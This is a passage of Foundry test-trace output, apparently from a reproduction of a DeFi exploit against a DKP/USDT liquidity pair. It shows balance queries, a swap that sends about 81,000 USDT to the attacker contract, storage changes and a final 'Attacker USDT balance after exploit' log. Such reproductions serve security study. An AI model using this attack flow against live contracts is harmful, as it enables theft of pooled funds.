    │   │   │   @ 33: 0x0000000000000000000000f3f67841cdc3ba3b8c2b88e15f931546d360a63501 → 0x00000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149601
    │   │   │   @ 34: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496 → 0x000000000000000000000000be654fa75bad4fd82d3611391fda6628bb000cc7
    │   │   │   @ 30: 0x00000000000000000000000000000000000000000000000098779cd37714f063 → 0x000000000000000000000000000000000000000000000013bfc76c44a362d810
    │   │   │   @ 0x1be98f1886b74672cf2c9a93e45efa6b0c95d7eb9f7c5eb6bc19009e6275d392: 0x00000000000000000000000000000000000000000000000202b31fdf0e80bea3 → 0x000000000000000000000000000000000000000000000031e4faa679fd4381d3
    │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffc4252697be558c8c02a
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000003bdad96841aa7373fd5 → 0
    │   │   │   @ 40: 0x00000000000000000000000000000000000000000000000042c72cf6c4b4195d → 0x0000000000000000000000000000000000000000000000136a16fc67f102010a
    │   │   └─ ← [Return] true
    │   ├─ [531] USDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 49880298545857678413 [4.988e19]
    │   ├─ [893] Pair::getReserves() [staticcall]
    │   │   └─ ← [Return] 260255564937846041755472 [2.602e23], 36873976322434846364457 [3.687e22], 1678270606 [1.678e9]
    │   ├─ [952] DKP::balanceOf(Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7]) [staticcall]
    │   │   └─ ← [Return] 53656716610799708901325 [5.365e22]
    │   ├─ [18782] Pair::swap(81262735682539956256469 [8.126e22], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [3271] USDT::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 81262735682539956256469 [8.126e22])
    │   │   │   ├─ emit Transfer(from: Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 81262735682539956256469 [8.126e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000002b43a6b401447cc4d → 0x000000000000000000000000000000000000000000001137f73b0e1822cc8b22
    │   │   │   │   @ 0x139c2d117d88cd530083ac1f85e15fbe50ca7509120bdf9690ce9a1c419bc781: 0x00000000000000000000000000000000000000000000371c7b8189e4289a3f50 → 0x0000000000000000000000000000000000000000000025e73880e70c1a15807b
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] USDT::balanceOf(Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7]) [staticcall]
    │   │   │   └─ ← [Return] 178992829255306085499003 [1.789e23]
    │   │   ├─ [952] DKP::balanceOf(Pair: [0xBE654FA75bAD4Fd82D3611391fDa6628bB000CC7]) [staticcall]
    │   │   │   └─ ← [Return] 53656716610799708901325 [5.365e22]
    │   │   ├─ emit Sync(reserve0: 178992829255306085499003 [1.789e23], reserve1: 53656716610799708901325 [5.365e22])
    │   │   ├─ emit Swap(sender: Router: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 0, amount1In: 16782740288364862536868 [1.678e22], amount0Out: 81262735682539956256469 [8.126e22], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x6408608e0000000007cef138128e0dc7132900000000371c7b8189e4289a3f50 → 0x6408608e000000000b5cbc87100dc63b8fcd0000000025e73880e70c1a15807b
    │   │   └─ ← [Stop]
    │   ├─ [531] USDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 81312615981085813934882 [8.131e22]
    │   └─ ← [Stop]
    ├─ [531] USDT::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 81312615981085813934882 [8.131e22]
    ├─ [2425] USDT::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker USDT balance after exploit", val: 80512615981085813934882 [8.051e22], decimals: 18)
    ├─  storage changes:
    │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000002b5e3af16b18800000
    │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 0x48daa37823a4a6aaa0950c817e29c013b93b366112361cd04cf01d10b3af4308: 0 → 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96
    │   @ 0x48daa37823a4a6aaa0950c817e29c013b93b366112361cd04cf01d10b3af430b: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 30.24s (27.90s CPU time)

Ran 2 test suites in 31.17s (30.96s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
